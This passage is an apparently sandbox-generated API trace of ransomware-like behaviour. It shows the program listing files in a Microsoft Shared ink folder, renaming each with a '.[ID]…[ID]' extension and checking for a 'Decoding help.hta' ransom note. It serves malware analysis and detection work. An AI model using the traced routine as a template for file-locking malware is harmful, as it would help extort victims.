Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipschs.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" [0052.373] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" [0052.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0052.373] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.373] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscht.xml", cAlternateFileName="")) returned 1 [0052.373] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.373] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipscht.xml") returned -1 [0052.373] lstrlenW (lpString="ipscht.xml") returned 10 [0052.373] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipscht.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" [0052.373] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" [0052.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0052.373] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.601] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscsy.xml", cAlternateFileName="")) returned 1 [0052.601] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.601] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.601] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipscsy.xml") returned -1 [0052.601] lstrlenW (lpString="ipscsy.xml") returned 10 [0052.601] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.601] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipscsy.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" [0052.601] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" [0052.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0052.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.601] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsdan.xml", cAlternateFileName="")) returned 1 [0052.601] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.601] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.602] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsdan.xml") returned -1 [0052.602] lstrlenW (lpString="ipsdan.xml") returned 10 [0052.602] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.602] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsdan.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" [0052.602] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" [0052.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0052.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.602] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsdeu.xml", cAlternateFileName="")) returned 1 [0052.602] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.602] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.602] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsdeu.xml") returned -1 [0052.602] lstrlenW (lpString="ipsdeu.xml") returned 10 [0052.602] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.602] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsdeu.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" [0052.602] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" [0052.603] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0052.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.603] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c6fece, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c6fece, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsen.xml", cAlternateFileName="")) returned 1 [0052.603] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.603] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.603] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0052.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0052.603] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsen.xml") returned -1 [0052.603] lstrlenW (lpString="ipsen.xml") returned 9 [0052.603] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0052.603] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0052.603] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsen.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" [0052.603] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" [0052.603] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0052.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.072] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsesp.xml", cAlternateFileName="")) returned 1 [0053.072] lstrcpyW (in: lpString1=0x3380118, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.072] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.072] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.072] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.072] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsesp.xml") returned -1 [0053.072] lstrlenW (lpString="ipsesp.xml") returned 10 [0053.072] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.072] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.072] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsesp.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" [0053.072] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" [0053.073] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.073] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58cd8515, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x58cd8515, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x5ca35e50, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPSEventLogMsg.dll", cAlternateFileName="")) returned 1 [0053.073] lstrcpyW (in: lpString1=0x3380118, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.073] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.073] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.073] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.073] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IPSEventLogMsg.dll") returned -1 [0053.073] lstrlenW (lpString="IPSEventLogMsg.dll") returned 18 [0053.073] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.073] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.073] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="IPSEventLogMsg.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll" [0053.073] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll" [0053.073] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0053.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.073] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, 